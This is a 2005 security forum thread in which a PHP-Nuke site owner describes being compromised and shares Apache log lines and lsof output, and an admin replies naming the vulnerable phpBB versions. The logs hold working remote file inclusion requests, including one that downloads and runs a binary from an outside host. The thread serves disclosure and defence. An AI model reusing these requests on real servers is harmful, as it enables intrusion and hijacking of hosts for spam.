You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 68 guest(s) and 2 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Hacked - info for you [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

Hacked - info for you
 
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
Author Message
kalbaz
Nuke Cadet
Nuke Cadet


Joined: Jun 22, 2005
Posts: 1
PostPosted: Wed Jun 22, 2005 6:34 am Reply with quoteBack to top
Today I was hacked using an offsite admin.php hack. I'm running phpnuke 7.4 with no security patches etc. Yes I know it's my fault I haven't been updating and as of now i've shutdown my site. I'm supplying information on the hacker, the method and the reasons I was hacked to you for your information.

Woke up today to find my server sending masses of spam, mostly to mtv.com.br and yahoo.com.br addresses. Immediately killed sendmail and cleared the entire queue (29,000 emails deferred).

Grabbed from apache logs:

200.149.111.241 - - [22/Jun/2005:12:52:55 +1000] "GET modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.panic0.oi.com.br/cmd.gif?&cmd=idHTTP/1.1" 200 8998
200.149.111.241 - - [22/Jun/2005:12:54:10 +1000] "GET modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.panic0.oi.com.br/cmd.gif?&cmd=wgetHTTP/1.1" 200 9042
200.149.111.241 - - [22/Jun/2005:12:54:23 +1000] "GET modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.panic0.oi.com.br/cmd.gif?&cmd=cd%20/var/tmp;wget%20http://msn1.mvhosted.com/newbash;chmod%20777%20newbash;./newbashHTTP/1.1" 200 9137

Seems my netstat was corrupted at some point, get seg faults on that. Or i have a ram issue. So using lsof managed to find these:

3 1888 root cwd DIR 3,1 4096 2 /
3 1888 root rtd DIR 3,1 4096 2 /
3 1888 root txt REG 3,1 652620 197633 /tmp/sh-A4IJCIAAB05 (deleted)
3 1888 root mem REG 3,1 103044 272658 /lib/ld-2.3.2.so
3 1888 root mem REG 3,1 91604 272673 /lib/libnsl-2.3.2.so
3 1888 root mem REG 3,1 23668 272667 /lib/libcrypt-2.3.2.so
3 1888 root mem REG 3,1 12696 272695 /lib/libutil-2.3.2.so
3 1888 root mem REG 3,1 1531064 320771 /lib/tls/libc-2.3.2.so
3 1888 root 0u CHR 1,3 33858 /dev/null
3 1888 root 1u CHR 1,3 33858 /dev/null
3 1888 root 2u CHR 1,3 33858 /dev/null
3 1888 root 3u IPv4 2448 TCP *:tproxy (LISTEN)


newbash 10159 apache cwd DIR 3,1 4096 2 /
newbash 10159 apache rtd DIR 3,1 4096 2 /
newbash 10159 apache txt REG 3,1 16840 293170 /var/tmp/newbash (deleted)
newbash 10159 apache mem REG 3,1 103044 272658 /lib/ld-2.3.2.so
newbash 10159 apache mem REG 3,1 1531064 320771 /lib/tls/libc-2.3.2.so
newbash 10159 apache 0u CHR 1,3 33858 /dev/null
newbash 10159 apache 1u CHR 1,3 33858 /dev/null
newbash 10159 apache 2u CHR 1,3 33858 /dev/null
newbash 10159 apache 3u IPv4 12288 TCP *:http (LISTEN)
newbash 10159 apache 4r FIFO 0,5 12292 pipe
newbash 10159 apache 5w FIFO 0,5 12292 pipe
newbash 10159 apache 6w REG 3,1 34449 147571 /var/log/httpd/error_log
newbash 10159 apache 7w REG 3,1 256045 147573 /var/log/httpd/access_log
newbash 10159 apache 8u sock 0,0 376083 can't identify protocol
newbash 10159 apache 9u unix 0xcd502580 378968 socket
newbash 10159 apache 10u IPv4 378983 TCP *:6697 (LISTEN)

So he had dumped some kind of proxy on my box as well as a apache replacement. Killed the processes, and of course the files used are gone. Looked through the nuke db and doesn't seem like any users were created at all, just seemed to use this exploit to dump the files and run them on my nix box.

Not sure i'll bring up my site again after this, i'll read through the various threads and security docs here and decide what to do.
Find all posts by kalbazView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12397
PostPosted: Wed Jun 22, 2005 8:06 am Reply with quoteBack to top
Looks like what they were doing was through the Forums itself. phpBB versions less than 2.0.15 are vulnerable.

Hope you get things running again

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.456 Seconds - 223 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::